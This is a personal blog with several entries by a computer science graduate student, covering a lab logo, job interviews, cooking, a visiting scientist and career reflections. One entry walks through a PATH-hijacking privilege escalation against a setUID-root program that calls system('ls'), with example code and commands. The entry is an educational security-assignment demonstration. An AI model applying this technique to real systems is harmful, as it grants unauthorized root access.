Logo design...

I was asked to design the Lab's logo. Dr Howard wanted something geeky, something kewl, something recursive or pointing to infinity and something which fits into a square (to save space in webpage). I was working on the logo in my free time ( sleep time == free time :P ). On the first iteration I came with the following logo:
This one was definitely kewl but the recursion/infinity not there :(.. the geek factor was also very low. Now am not a graphic designer so no flames for the crappy quality (BTW I made on gimp on debian...).

I started iterating on the design and came up with the following design:
This one is a bit more refined, definitely geeky, kewl, square and is infinite, metamorphically pointing to the essense of our lab working on short term memory, an infinite set of possibilities locked inside the hippocampus. But alas, the readability goes down the drain. I made the right hand side a bit more jagged, cuz that gave an effect of an infinite hallway and kindda improved the readability.

I have kindda hit a barrier here and due to my demanding schedule I have not thought much about the next version. It would be great if you guys can give me feedback or suggestions about the logo, something that has to be changed or totally scrapped down....

PS: My interview was good and the interviewer was so thrilled abt my job here that she asked really few technical questions and kept on digging about my work here... Anyway do comment on the logos

Happy Bday Blog...

Today is my blog's first birthday. I started blogging on Feb 19'05.... I looked back the first entry, it was a rant about staying in office on weekends... phew came a long way since.

BTW have an interview with Microsoft on monday so wish me best of luck. This will be my first technical interview (face 2 face... technically the first was Intel's). I was lucky enough to get jobs without being interviewed in India (no I did not use reference so dont raise your eyebrows). I am having a funny feeling in my stomach as there is so much to study in less time. I cant possibly brush all that I have learnt in a span of two days. Am hoping for the best...the interview call itself came as a surprise to me as my resume did not have any Windoze project in it and shouts Linux all over... well anything for cash.... yeah go hit me with something.

Moreover my GPA(3.44) makes me feel ostracized. Earlier all the Indians in US blabbered about fairer education system and said that higher GPA did not count, but companies like TI, AMD etc who work more on the lines of device drivers and system software want a GPA of atleast 3.5 !!! I guess I will have to work harder (less of computer time and more of reading time) next time :|

Came across this wonderful guide by Joel on interview techniques... a must read for all tech students.

SetUID.... Where human intellect meets a dead end

While doing my computer security assignment I was really amused to discover PAM. It is a really nifty way to separate security checking from your code. With just a simple config file modification and no change in the source code or binary( and hence no recompilation), you can charge up the security to levels of insanity. By levels of insanity, I mean that you can make the simple su, passwd commands to not only ask for passwords but also retina scans, voice recognition, DNA analysis (all the biometric systems in short) etc... and on a single user system you can do the reverse, i.e. remove all the security.
Then setUID comes along...
For n00bs, setUID is the mechanism that allows the user to run the program as the owner of the program... great for containing access. So when you change your password, the password file and the passwd have root privileges. The only way out in *nix is to elevate the user to the root just for the duration of program execution. But this seemingly innocent mechanism is the root of all evil. At this point windows' user might ask about their OS.... well Windoze does it differently. They have a service for each and every program requiring root privilege. That means that they have pseudo servers running continuously for each service!!! That's crazy cuz for something as infrequent as changing password, I would hate to run a continuous process on my PC. And they can be exploited too.
Here is how I exploited setUID...

• Suppose there is a file which has its setUID bit set and uses the system() call to do something.

Lets take a dummy file:

#include < unistd.h >
int main(){
 system("“ls"”);
 return 0;
}

• Now complile it #gcc dummy.c -o dummy.
• change the setUID bit... #chmod 4755 dummy.
• Login as a normal user.
• Now you are the attacker. Write a simple file that does something evil say copy or overwrite something in the /bin folder. Here is the barebones program for that.
  

#include < unistd.h >
int main(){
 system("“cp somefile //bin//"”);
 return 0;
}

• Compile it and name the output as ls. $gcc somefile.c -o ls
• Change the Env variable PATH.... $PATH=/home/sridhar/:/bin/ ;export PATH

Run the program dummy as a normal user and BAM... u you have cracked the system. Instead of copying something, I could have opened a root shell and corrupted the whole system.

Now you may argue that why will root user make a program that uses such primitives?? Time and again, tested programs like passwd and the webservers are exploited in this simple way. setUID is inevitable. You need to practice secure programming to stop this from happening... but there are too many venus fly traps. setUID does cover obvious security holes but exposes new ones (the not so obvious types). There are other exploits on setUID too (the more subtler and hence more venomous) but I guess I made my point.

For the past 50 years, the computing community is scrambling to get the perfect security and sandboxing mechanism and we are no closer to the answer now than we were before.

Food...

Food is the most negelected necessity in my life. For me sleeping, eating & travelling is a waste of time so I do these things as fast as possible (I am a jerk... I am cutting down my sleep to blog :P ). Last one year at Bangalore, I was totally dependent on my Dabba wallah, who gave something edible... other than that I hogged junk stuff.

My past 7 months in US have been worse. Being a vegetarian, with the exception of egg, the only choice I had were cheese pizzas. The vegetarian subs and sandwiches in US are more inclined towards the salad type dressing and eating them is like cud chewing. Uncooked vegetables are not my menu. I couldn't care less... I was happily eating pizzas for 7 months without complaining.

Lately I started feeling physically week as I am literally staying in the university library due to terribly taxing courses I have taken this semester, and pizzas dont help much. I started looking for alternatives and thus I began my exciting journey of cooking. (I have been on it since two days now)

My role in group cooking is generally limited to cutting onions or cooking rice, cuz all my other works had been a disaster and I am an expert onion cutter... no kidding... i can do it as fast as the chefs on the television shows... so no one cries :)... so I learnt from my roomies' mistakes and vaguely from my mom's 3 hr crash course.

After months of trial and error, I made a perfect Alu Gobhi curry today...(no body was there so I had all the time to experiment)
If you think it is silly, get yourself a meal after 6 months of only cheese pizzas. Ofcourse I did not make the bread myself, they are frozen tortillos and there is apple juice in the cup.... HEAVEN.

Visit from a Knight

Got to meet Dr Ralph Miller today at work. He is a well known Computational Neuroscientist working at University of Binghamton. I wont bore you with what he does but will surely tell you something about him that excited my very core. Each molecule of my body was vibrating in a strange tune in his presence.

The talk started between my cabin mates and him. We thought that he would be surprised to know that we all were from different fields of studies , me being from computer science and other two being from electrical engineering and bio-medical respectively.As a matter of fact, he wasnt!! He lapsed into a flashback and gave us a brief insight about his background. He got a BS and MA in physics from MIT!!! Was working under a team, three of whom got a nobel prize!! He got 2 more masters and a Phd from Rutgers university. He told me about a startup company called DEC!! (he told as if he never knew that DEC was a big company now) and about PDP-1 he programmed in using punched cards. You would have heard alot about the inception of word "BUG" in computer jargon but it is really amazing when someone present there at the time tells you about his own accounts. Its really amazing. Its like being in the world of Mythology... and meeting with the titans. He gleefully exclaimed that made vaccum tubes for his project. I have not even seen one in reality.

The icing on the cake was when I googled for Ralph R Miller and checked out his Curriculum vita. Its a whooping 44 page resume, by far the largest I have seen. I hope to be just like him (I would love to have the Nobel Prize though) when I grow up :) and have the money of Bill Gates :P

Life is a fractal

The title of this entry is self explanatory. Life exposes a new dimentionality of itself everytime you think that you have understood it. You unravel a complexity and then discover a new one. In the end its just like accessing an element of an infinite set. If you understand the concept of infinity, you can never have all the elements... logical reasoning breaks down and your conceptual baggage causes you to drown into a sea of irrelevance. Well if you lost me, ... then you are lucky,.. you are in the 98% of the world population who enjoy the bliss of ignorance. I dont mean to demean you but more knowledge does not necessarily make you a better person, sometimes you wish you never knew what you know. (and regarding the infinity problem, read Hilbert's hotel)

The causality of such a thought occuring is strange in its own sense. When I was in high school, I loved puzzles and I loved computers. So I got a bachelor's degree in Computer Engg and Science. At the end of college I realized that I loved the science part better than the engineering part. I developed an appetite for linux all along. Just to take my curiousity to the next level I decided to do MS in computer science. And yeah... software got more and more closer to me. My work in computational neuroscience kept me in sync with the science part of computers. That had its perks and pitfalls, the pitfalls being - you tend to get biased to certain technology. In my case, I started hating Microsoft and liking *nix (well thats what most of the computer scientists like).

Down back in India I had five offers in hand and I was interviewed only twice... so I had the opportunity to pick the job I liked. Recently I got rejected for an internship position in Intel.( ofcourse I was overconfident)... that made my confidence to shatter to pieces. Later today I attended a career fair organized by my grad school. I applied to Microsoft, against myself.... a decision based solely on monetary grounds. I know that is not a big thing for any of you guys but I felt like I had commited a treachery.... something like murder. I told that to someone (well no names here again) and he said "Anakin dont go the to dark side" ... was I??
I have decided to lose all my inhibitions, do anything possible to reach the top, even if that means I have to maintain cobol databases for some multinational bank... well maybe not if I am strong enough.